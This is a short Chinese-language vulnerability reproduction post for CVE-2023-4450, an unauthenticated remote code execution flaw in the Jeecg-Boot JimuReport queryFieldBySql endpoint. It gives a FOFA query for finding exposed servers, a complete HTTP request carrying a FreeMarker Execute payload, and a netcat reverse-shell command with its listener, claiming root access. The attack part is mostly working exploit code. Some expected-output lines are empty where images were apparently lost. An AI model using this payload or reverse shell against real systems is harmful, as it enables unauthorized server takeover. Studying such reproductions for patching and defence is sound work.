jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现

jeect-boot积木报表由于未授权的 API /jmreport/queryFieldBySql 使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。

1.漏洞级别

高危

2.漏洞搜索

fofa

app="Jeecg-Boot 企业级快速开发平台"

3.影响范围

JimuReport < 1.6.1

4.漏洞复现

这个漏洞的注入点就在于/jeecg-boot/jmreport/queryFieldBySql 且无需用户授权即可执行

构造数据包

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate, br
Accept: */*
Content-Type: application/json
Content-Length: 102

{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"whoami  \") }' "}

如果漏洞存在,则会出现以下内容:

如果命令失败则会显示:

漏洞相对简单,到这里就复现成功了。

4.2 进一步利用

如果想要进一步rce的话,可以通过nc的方法来反弹shell,执行

nc -e /bin/bash ip port

远程服务器执行,即可正常获取shell

nc -lvp 8888

成功getsshell,root权限

相关推荐
南暮思鸢25 天前
HelloCTF [RCE-labs] Level 3 - 命令执行
经验分享·web安全·网络安全·php·知识分享·rce漏洞·rce-labs靶场
阿呆不呆@qq3 个月前
springblade-JWT认证缺陷漏洞CVE-2021-44910
cve·漏洞复现
网友小黑3 个月前
Tomcat常见漏洞复现
web安全·tomcat·漏洞复现
运维Z叔4 个月前
记一次因敏感信息泄露而导致的越权+存储型XSS
运维·前端·数据库·安全·渗透·xss·漏洞复现
凝聚力安全团队4 个月前
【漏洞复现】通达OA v2017 video_file.php 任意文件下载漏洞
web安全·web·漏洞·漏洞复现·web渗透
一个叶绿体5 个月前
JBoss JMXInvokerServlet 反序列化漏洞
漏洞复现
渗透测试老鸟-九青5 个月前
redis未授权访问漏洞复现
数据库·redis·缓存·漏洞复现
凝聚力安全团队5 个月前
【漏洞复现】海康威视 综合安防管理平台软件 center_api_files 任意文件上传漏洞
web安全·网络安全·渗透测试·web·漏洞·漏洞复现
CVE-柠檬i5 个月前
Windows CSC提权漏洞复现(CVE-2024-26229)
渗透测试·黑客攻防·漏洞·cve·漏洞复现
Z3r4y5 个月前
【代码审计】star7th/showdoc:v3.2.4 Phar反序列化写webshell
web·代码审计·thinkphp·漏洞复现·showdoc·xve-2023-28617·guzzlehttp